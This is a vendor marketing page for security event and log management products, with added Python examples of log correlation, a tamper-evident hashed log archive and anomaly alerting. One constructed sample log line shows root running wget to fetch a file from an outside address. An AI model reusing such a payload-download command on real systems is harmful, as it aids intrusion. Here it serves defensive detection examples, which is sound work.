Synergon System Integrator
Security Event and Incident Management Systems, Log Collection, Analysis

The management of IT security incidents is a process that enables an organization to detect attacks against its computer systems and supports the organized elimination of these threats as fast as possible. The purpose of incident management is to respond in time to the situations that develop and thereby minimize their impact on business operations. One of the first steps of efficient incident management is the detection of incidents. With firewalls generating several million log entries per day, plus intrusion prevention tools, virus protection systems, vulnerability scanners and other systems, this is almost impossible without sophisticated, specialized tooling.

netForensics

In general there is no connection between unrelated systems that would highlight related log entries, or compare the information produced by one tool with the information produced by the others. The nFX SIM|One product of NetForensics receives and processes the log entries of many different products. By analysing the log entries that converge on the central device, it can highlight events that would not have been visible in any one data set on its own. The automated analysis ensures that security staff do not spend 90% of their working time reading logs, which significantly increases the efficiency of both the security system and the security staff.
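The kind of cross-source correlation described above, as an added example that is not part of the original page and not NetForensics code: three independent sources (firewall, IDS, anti-virus) are parsed into a common shape and two rules fire only when records from different sources line up in time. The log formats, rule names, thresholds and sample lines are all constructed for the example.

```python
"""Cross-source event correlation over constructed firewall, IDS and anti-virus logs.

Added example: a minimal correlation engine of the kind the SIM product is
described as providing. It is not NetForensics code, and the log formats,
rule names and thresholds are invented for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events from three independent sources, in time order.
SAMPLE_LOGS = """\
2009-03-02 10:00:01 fw  DENY tcp 203.0.113.7 -> 192.0.2.10:22
2009-03-02 10:00:02 fw  DENY tcp 203.0.113.7 -> 192.0.2.10:23
2009-03-02 10:00:03 fw  DENY tcp 203.0.113.7 -> 192.0.2.10:445
2009-03-02 10:00:09 ids ALERT sid=2001219 "SSH brute force" src=203.0.113.7 dst=192.0.2.10
2009-03-02 10:00:40 fw  ALLOW tcp 203.0.113.7 -> 192.0.2.10:22
2009-03-02 10:03:15 av  DETECT host=192.0.2.10 threat=Trojan.Generic action=quarantine
2009-03-02 10:05:00 fw  DENY udp 198.51.100.4 -> 192.0.2.20:161
2009-03-02 11:30:00 ids ALERT sid=2001219 "SSH brute force" src=198.51.100.9 dst=192.0.2.30
"""

# One parser per source; each yields the same normalised field names where they overlap.
PARSERS = {
    "fw": re.compile(r'^(?P<ts>\S+ \S+) fw\s+(?P<action>DENY|ALLOW) \w+ '
                     r'(?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+)$'),
    "ids": re.compile(r'^(?P<ts>\S+ \S+) ids ALERT sid=(?P<sid>\d+) "(?P<msg>[^"]+)" '
                      r'src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+)$'),
    "av": re.compile(r'^(?P<ts>\S+ \S+) av\s+DETECT host=(?P<host>[\d.]+) '
                     r'threat=(?P<threat>\S+) action=(?P<action>\S+)$'),
}


def parse(text):
    """Normalise raw lines from every source into dicts with a shared timestamp field."""
    events = []
    for line in text.splitlines():
        for source, rx in PARSERS.items():
            m = rx.match(line)
            if m:
                e = m.groupdict()
                e["source"] = source
                e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")
                events.append(e)
                break
        else:
            raise ValueError(f"unparsed line: {line!r}")
    return sorted(events, key=lambda e: e["ts"])


def correlate(events, deny_threshold=3, window=timedelta(minutes=15)):
    """Apply two cross-source rules and return the incidents they produce.

    probe_then_alert:          >= deny_threshold firewall DENYs from one source
                               address in the window before an IDS alert on it.
    alert_then_host_infection: an IDS alert, then a firewall ALLOW from the same
                               attacker to the same target, then an AV detection
                               on that target, all inside the window.
    Seen in isolation each of these records is routine; together they are not.
    """
    by_src = defaultdict(list)      # firewall + IDS records keyed by attacker address
    av_by_host = defaultdict(list)  # anti-virus records keyed by protected host
    for e in events:
        if e["source"] == "av":
            av_by_host[e["host"]].append(e)
        else:
            by_src[e["src"]].append(e)

    incidents = []
    for src, evs in by_src.items():
        for alert in (e for e in evs if e["source"] == "ids"):
            before, after = alert["ts"] - window, alert["ts"] + window
            denies = [e for e in evs if e["source"] == "fw" and e["action"] == "DENY"
                      and before <= e["ts"] <= alert["ts"]]
            if len(denies) >= deny_threshold:
                incidents.append({"rule": "probe_then_alert", "severity": "medium",
                                  "src": src, "dst": alert["dst"], "ts": alert["ts"],
                                  "evidence": len(denies) + 1})
            allows = [e for e in evs if e["source"] == "fw" and e["action"] == "ALLOW"
                      and e["dst"] == alert["dst"] and alert["ts"] <= e["ts"] <= after]
            detects = [e for e in av_by_host.get(alert["dst"], [])
                       if alert["ts"] <= e["ts"] <= after]
            if allows and detects:
                incidents.append({"rule": "alert_then_host_infection", "severity": "high",
                                  "src": src, "dst": alert["dst"], "ts": detects[0]["ts"],
                                  "evidence": 1 + len(allows) + len(detects)})
    return incidents


if __name__ == "__main__":
    for inc in correlate(parse(SAMPLE_LOGS)):
        print(inc["ts"], inc["severity"].upper(), inc["rule"], inc["src"], "->", inc["dst"])
```

On the sample data the second IDS alert (from 198.51.100.9) produces nothing, because no firewall or anti-virus record corroborates it; the first one produces both a medium and a high incident because the firewall and the anti-virus tell the rest of the story. The point is that none of the three sources alone would have raised the high-severity case.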

nFX SIM|One can generate everything from detailed analytical reports aimed at technicians to comprehensive summary reports suitable for presentation to management. In addition to the built-in reporting templates, the user's own Crystal Reports templates can also be used.

Redundancy 

nFX SIM|One redundancy can be implemented at every level of the system, even when the installation is geographically distributed. Event correlation is distributed in such a way that the load-balancing system preserves availability even when a very high volume of log entries has to be processed (for example, during a DoS attack). Redundancy between sites means that if the primary site goes down, every task (receipt of log entries, analysis, reporting and compliance checking) can be performed from the second site.

Logging 

The robust yet flexible data structure of nFX SIM|One preserves data integrity and satisfies audit and reporting requirements.

A separate interface, the System Health Monitor, tracks the status of the system. It provides accurate, online information about the status of every component and raises alarms when a component malfunctions.

Cisco MARS

Cisco Security MARS is a powerful, highly scalable family of appliances for the management, monitoring and mitigation of threats, which lets customers make more efficient use of their network and security devices.

  • Cisco Security MARS combines traditional security event monitoring with network intelligence and automated threat mitigation functions.

  • It collects data from many network components (Cisco and third-party products), correlates it, and can block the attack it identifies

  • It can stop attacks in progress and trace the path of the attack

  • As a dedicated appliance it can be deployed rapidly and simply

  • It can handle as many as 10 000 events per second

Cisco Security MARS is part of the Cisco Security Management Suite, which provides centralized administration and comprehensive deployment of Cisco's network security tools.

Netforensics Log One

The Log One solution collects logs, sorts, compresses and encrypts them, then presents them in compliance and audit reports. nFX Log One saves a large part of the cost associated with log collection, and thanks to its built-in reports you can forget about the headaches that sophisticated, administration-heavy log analysis used to cause. The recently introduced version 6.0 of nFX Log One carries on the enterprise-level log management functionality the product has always been known for, supporting organizations in meeting every requirement that rests on the collected event logs. The new features stem mainly from the new architecture and enhanced scalability: syslog data collection, extended data collection, compression, validation capabilities, support for 64-bit systems and a streamlined user interface. The capability to collect and interpret logs from almost every device and application gives log collection a central role in passing audits. With these new features nFX Log One performs well at any scale of enterprise IT system.
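Compression and integrity validation of collected logs, as named in the Log One description above and in the data-integrity claim for nFX SIM|One, can be demonstrated with a keyed hash chain. The following is an added example, not nFX Log One's archive format or any NetForensics code; the key, the batches of log lines and the record fields are constructed for the example.

```python
"""Tamper-evident compressed log archive with a keyed hash chain.

Added example illustrating the compression and integrity-validation functions
described above. It is not nFX Log One's own archive format; the key, batches
and field names are constructed for the example.
"""
import gzip
import hashlib
import hmac

# Constructed key. In a real deployment it must live outside the log host (HSM,
# separate key store): an attacker who can rewrite the archive AND read the key
# can simply recompute the chain.
ARCHIVE_KEY = b"example-only-archive-key"
GENESIS = b"\x00" * 32  # chain anchor for the first batch

# Constructed batches of already-collected log lines (e.g. one per hour).
SAMPLE_BATCHES = [
    ["Mar  2 10:00:01 fw1 kernel: DENY IN=eth0 SRC=203.0.113.7 DST=192.0.2.10 DPT=22",
     "Mar  2 10:00:02 fw1 kernel: DENY IN=eth0 SRC=203.0.113.7 DST=192.0.2.10 DPT=23"],
    ["Mar  2 11:00:00 srv1 sshd[4121]: Failed password for root from 203.0.113.7 port 40122",
     "Mar  2 11:00:05 srv1 sshd[4121]: Accepted password for root from 203.0.113.7 port 40130",
     "Mar  2 11:02:10 srv1 sudo: root : COMMAND=/usr/bin/wget http://198.51.100.9/x"],
    ["Mar  2 12:00:00 srv1 cron[911]: (root) CMD (/usr/lib/sa/sa1 1 1)"],
]


def seal_batch(key, prev_tag, lines):
    """Compress one batch and compute its chain tag.

    tag = HMAC-SHA256(key, prev_tag || SHA-256(blob)).  Because prev_tag is part
    of the input, a tag commits to the whole history before it, not just to this
    batch.  mtime=0 keeps the gzip output deterministic.
    """
    blob = gzip.compress("\n".join(lines).encode("utf-8"), mtime=0)
    digest = hashlib.sha256(blob).digest()
    tag = hmac.new(key, prev_tag + digest, hashlib.sha256).digest()
    return {"blob": blob, "digest": digest.hex(), "tag": tag.hex()}


def build_archive(key, batches):
    records, prev = [], GENESIS
    for lines in batches:
        rec = seal_batch(key, prev, lines)
        records.append(rec)
        prev = bytes.fromhex(rec["tag"])
    return records


def verify_archive(key, records):
    """Return (True, None) if intact, else (False, index of the first bad record).

    Caveat: a chain alone cannot detect truncation of the LAST records; store the
    final tag out of band (separate host, WORM media) and compare it as well.
    """
    prev = GENESIS
    for i, rec in enumerate(records):
        digest = hashlib.sha256(rec["blob"]).digest()
        expected = hmac.new(key, prev + digest, hashlib.sha256).digest()
        if digest.hex() != rec["digest"] or \
                not hmac.compare_digest(expected, bytes.fromhex(rec["tag"])):
            return False, i
        prev = bytes.fromhex(rec["tag"])
    return True, None


def read_batch(rec):
    return gzip.decompress(rec["blob"]).decode("utf-8").splitlines()


def tamper_demo():
    """Remove the incriminating 'Accepted password' line from batch 1 and
    recompute the plain digest, as an attacker without the key would."""
    records = build_archive(ARCHIVE_KEY, SAMPLE_BATCHES)
    before = verify_archive(ARCHIVE_KEY, records)
    kept = [l for l in read_batch(records[1]) if "Accepted password" not in l]
    blob = gzip.compress("\n".join(kept).encode("utf-8"), mtime=0)
    records[1].update(blob=blob, digest=hashlib.sha256(blob).hexdigest())
    return before, verify_archive(ARCHIVE_KEY, records)


if __name__ == "__main__":
    print(tamper_demo())  # ((True, None), (False, 1))
```

The plain SHA-256 digest is there for fast corruption checks; the keyed tag is what makes deliberate editing detectable, because the editor can recompute the digest but not the tag. Encryption of the blobs, which the product description also mentions, is a separate layer and is deliberately left out so the chain stays readable.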

BalaBit syslog-ng

BalaBit IT Security is a company developing security software, which was established in Hungary and has operated in international markets from the very beginning. BalaBit's development and sales center is in Budapest; the company also has a German subsidiary in Munich, which coordinates sales in Western Europe.

syslog-ng PE is a multi-platform central logging solution that includes both the logging client and the logging server.

On the one hand, the log analysis tools produce reports automatically and on request, from which the administrators operating the system can monitor its general state. The statistics may cover the peak and average load of the network connection, the processors or the hard disks, the distribution of usage among services, and many other features. On the other hand, the log analysis tools can also detect the occurrence of predefined events and send alerts over predefined channels. The predefined events are, in effect, intelligence programmed in by the operators: they tell the analysis software which network states, when they occur together, may indicate an event that gives cause for security concern.

Alerts may be triggered by monitoring specific values, but more sophisticated, self-learning systems can also send alerts, much as in the analysis of stock market charts, when the shape of certain time series departs from normal. With periodically generated reports, the network operators can easily satisfy the documentation requirements of the various audits.
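The two alerting styles contrasted above, a fixed threshold on a value and a self-learning baseline that reacts when a time series departs from normal, side by side as an added example. This is not syslog-ng or BalaBit code; the per-bucket event counts are constructed, and the z-score baseline is one simple way to implement the second style, not the vendor's method.

```python
"""Threshold alerts versus a self-learning baseline over an event-rate series.

Added example for the two alerting styles described above; not syslog-ng or
BalaBit code. The per-bucket counts are constructed for illustration.
"""
from statistics import mean, pstdev

# Constructed: firewall DENY counts per 5-minute bucket from a quiet period,
# used to learn what "normal" looks like.
BASELINE = [40, 45, 38, 52, 47, 41, 49, 44, 50, 43, 46, 48]
# Constructed live series: a low-and-slow probe (95), a loud burst (180, 210)
# and a collector that suddenly goes almost silent (2).
LIVE = [44, 47, 51, 95, 180, 210, 49, 46, 2]


def static_threshold_alerts(series, limit):
    """Classic rule: alert on any bucket above a fixed limit.  Misses the probe
    that stays under the limit and cannot notice a source that falls silent."""
    return [i for i, v in enumerate(series) if v > limit]


class RateBaseline:
    """Learn mean and spread from history; flag samples whose z-score is extreme.

    Samples judged anomalous are NOT fed back into the baseline, so a sustained
    burst cannot gradually 'teach' the detector that the burst is normal.
    """

    def __init__(self, history, z_limit=3.0, min_spread=1.0):
        self.samples = list(history)
        self.z_limit = z_limit
        self.min_spread = min_spread  # floor so a flat history cannot divide by zero

    def score(self, value):
        sigma = max(pstdev(self.samples), self.min_spread)
        return (value - mean(self.samples)) / sigma

    def observe(self, value):
        z = self.score(value)
        anomalous = abs(z) > self.z_limit
        if not anomalous:
            self.samples.append(value)
        return anomalous, round(z, 2)


def baseline_alerts(history, series, z_limit=3.0):
    """Indices of the live series that the learned baseline flags."""
    detector = RateBaseline(history, z_limit)
    return [i for i, v in enumerate(series) if detector.observe(v)[0]]


if __name__ == "__main__":
    print("static  :", static_threshold_alerts(LIVE, 100))  # [4, 5]
    print("baseline:", baseline_alerts(BASELINE, LIVE))     # [3, 4, 5, 8]
```

With a limit of 100 the static rule sees only the loud burst. The baseline also catches the probe at 95 (about twelve standard deviations above a mean of roughly 45) and the near-silent bucket at the end, which in a log-collection setting usually means a source or collector has stopped reporting rather than that the network went quiet. Both failure modes are worth alerting on, and neither is a matter of picking a better fixed number.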

WHY SYNERGON SYSTEM INTEGRATOR?

Synergon has outstanding professional skills not only in the field of incident management but, as a supplier of comprehensive infrastructure, also across the wide range of solutions that have to be integrated, which supports the successful implementation of projects. Thanks to these skills, both the individual components and the designs that require an understanding of how those components interrelate can be delivered with ease.

FREQUENTLY ASKED QUESTIONS

What is the difference between incident management systems and system management applications?

Incident management systems are targeted solutions developed expressly for the management of security events, and their internal correlation engine is designed accordingly. General system management applications, by contrast, focus on availability and performance monitoring rather than on correlating security events across sources.

Is this solution suitable for the development of individual interfaces, alerts or access levels?

Yes. One significant advantage of the solutions we recommend is their customizable interface; by customizing it we can also integrate products that are not on the supported list. Alerts are configured by rule, so the responsible person is always alerted about a given incident while information the company does not need is filtered out. By regulating access levels we can provide the separation of duties expected by the various audits.

Is this solution suitable for distributed operation and the archiving of the events?

Yes, which is how we build the solution even for large IT environments. Archiving of events is provided by built-in modules.


You can obtain more information about our solutions by contacting us.